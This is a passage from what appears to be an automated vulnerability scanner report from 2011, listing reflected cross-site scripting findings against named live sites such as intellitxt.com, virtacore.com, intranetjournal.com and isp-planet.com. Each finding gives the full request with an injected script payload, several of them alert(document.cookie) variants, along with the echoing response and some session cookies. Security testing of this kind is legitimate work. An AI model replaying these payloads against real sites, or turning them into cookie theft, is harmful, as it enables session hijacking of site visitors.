var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... "POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","cff44"-alert(1)-"2e3ab260276":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82\u003d1","rcc":"us","cc":"us"},null,60); ...[SNIP]...
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5943c%3balert(1)//88cafba6704 was submitted in the jscallback parameter. This input was echoed as 5943c;alert(1)//88cafba6704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110218151842&adid=0%2C0%2C0%2C0%2C168581&cc=us&di=29875403%2C28599592%2C28599656%2C30018999%2C30085818&hk=1&ipid=26443&mh=1fc3c70af67df0d9d8cc9dfe06cabe3f&pid=2%2C2%2C2%2C2%2C2&pvm=db1942607d3ea8ded55849e322184dee&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0&kp=544%2C819%3B372%2C881%3B265%2C1144%3B102%2C1627%3B184%2C1701%3B&prf=ll%3A1190%7Cintl%3A2438%7Cpreprochrome%3A5%7Cgetconchrome%3A264%7Ccontint%3A9543%7Ccontl%3A12253%7Cadvint%3A1287%7Cadvl%3A13540%7Ctl%3A13642&jscallback=$iTXT.js.callback105943c%3balert(1)//88cafba6704 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:18:26 GMT; Path=/ Content-Type: text/javascript Content-Length: 66 Date: Fri, 18 Feb 2011 15:18:26 GMT Age: 0 Connection: keep-alive
3.68. http://vbforums.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vbforums.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4ad8'-alert(1)-'ecc7883e0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:16:59 GMT Age: 0 Connection: keep-alive Content-Length: 10597
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... rc="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151659";})();$iTXT.js.serverUrl='http://vbforums.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9cb15%3balert(1)//db24a5d0383 was submitted in the jscallback parameter. This input was echoed as 9cb15;alert(1)//db24a5d0383 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1298042320867&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback99cb15%3balert(1)//db24a5d0383 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:18:23 GMT Age: 0 Connection: keep-alive Content-Length: 10217
(function(){var nh = new $iTXT.ui.Hook({value: "applications",uid: "A379E9596BF046EEAB0EA695CA98EC12",uidh: "cccd3cce584bdc87b30947aabdb3865c",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT ...[SNIP]... d;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('ExpandableFlash');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback99cb15;alert(1)//db24a5d0383();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 696d5%3balert(1)//34ca25cba28 was submitted in the jscallback parameter. This input was echoed as 696d5;alert(1)//34ca25cba28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1298042311324&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=60204&jsoncl=7046&ppc=-1&hn=47&chunkkey=26443:1fc3c70af67df0d9d8cc9dfe06cabe3f:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Drop%20in%20here%20to%20discuss%20all%20editions%20and%20versions%20of%20Visual%20Basic%20.NET%20(2002%20or%20later)%20or%20anything%20to%20do%20with%20VB%20.NET%20programming.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22This%20forum%20is%20for%20all%20your%20Visual%20Basic%20(versions%203%2C%204%2C%205%2C%20%26%206)%20coding%20questions%20that%20do%20not%20fit%20into%20one%20of%20the%20more%20specific%20forums%20below.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22Post%20all%20your%20questions%20here%20regarding%20Microsoft%20Office%20Automation.%20This%20can%20include%20VSTO%2C%20VSTA%2C%20and%20VBA%20questions.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22This%20forum%20is%20the%20place%20to%20post%20all%20your%20questions%20about%20using%20the%20Internet%20within%20your%20applications.%20Topics%20include%3A%20writing%20components%20for%20ASP%20(classic)%2C%20VB%20Script%2C%20and%20more.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22Post%20your%20questions%20about%20developing%20applications%20to%20interact%20with%20databases%20here.%20Topics%20include%20Using%20the%20Data%20Control%2C%20D&chunk=0&total=8&jscallback=$iTXT.js.callback1696d5%3balert(1)//34ca25cba28 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Fri, 18 Feb 2011 15:18:30 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 233b5%3balert(1)//883b0a64c48 was submitted in the jscallback parameter. This input was echoed as 233b5;alert(1)//883b0a64c48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0233b5%3balert(1)//883b0a64c48 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:18:28 GMT Age: 0 Connection: keep-alive Content-Length: 16909
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0233b5;alert(1)//883b0a64c48({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.72. http://vbforums.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vbforums.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb6b"-alert(1)-"6fb46acbb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0&adb6b"-alert(1)-"6fb46acbb2=1 HTTP/1.1 Host: vbforums.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:18:33 GMT Age: 0 Connection: keep-alive Content-Length: 16889
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","adb6b"-alert(1)-"6fb46acbb2":"1","refurl":"http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6\u003d1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined= ...[SNIP]...
3.73. http://virtacore.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://virtacore.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f9b</script><script>alert(1)</script>bbeb208fd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?66f9b</script><script>alert(1)</script>bbeb208fd95=1 HTTP/1.1 Host: virtacore.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 03:22:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=11130808;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/ Set-Cookie: CFTOKEN=43832625;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/ Content-Type: text/html; charset=UTF-8
The value of the rxtype request parameter is copied into the HTML document as plain text between tags. The payload dc41d<script>alert(1)</script>cc8d1806ffc was submitted in the rxtype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 03:24:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
{history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=dc41d<script>alert(1)</script>cc8d1806ffc&ts=1297999477134-11130790-98617796 <style> ...[SNIP]...
3.75. http://www.internet.com/developer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.internet.com
Path:
/developer
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d7d7<script>alert(1)</script>a487c4b6236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /developer?2d7d7<script>alert(1)</script>a487c4b6236=1 HTTP/1.1 Host: www.internet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;
The value of the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 request parameter is copied into an HTML comment. The payload 5d31c--><script>alert(1)</script>5c6cf7ebb2d was submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d HTTP/1.1 Host: www.intranetjournal.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:23:51 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:24:51 GMT Content-Type: text/html Content-Length: 149706
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <!-- test --> <link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0 url: /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d --> ...[SNIP]...
3.77. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intranetjournal.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5d85--><script>alert(1)</script>177b53bcb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?c5d85--><script>alert(1)</script>177b53bcb4=1 HTTP/1.1 Host: www.intranetjournal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:54:37 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:55:37 GMT Connection: close Content-Type: text/html Content-Length: 149165
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <!-- test --> <link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0 url: /?c5d85--><script>alert(1)</script>177b53bcb4=1 --> ...[SNIP]...
3.78. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/about/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fd8e5--><script>alert(1)</script>d97a1fbd30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:06 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:06 GMT Connection: close Content-Type: text/html Content-Length: 66636
<HTML> <HEAD> <TITLE>ISP-Planet - Welcome</TITLE> <META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 --> ...[SNIP]...
3.79. http://www.isp-planet.com/business/associations/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/business/associations/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f2f36--><script>alert(1)</script>ba42ff8b252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:42 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:42 GMT Connection: close Content-Type: text/html Content-Length: 52755
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Business - Directory of ISP Associations</title> <meta n ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 --> ...[SNIP]...
3.80. http://www.isp-planet.com/fixed_wireless/equipment/distributors/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/fixed_wireless/equipment/distributors/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f2ae--><script>alert(1)</script>0c6527430b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
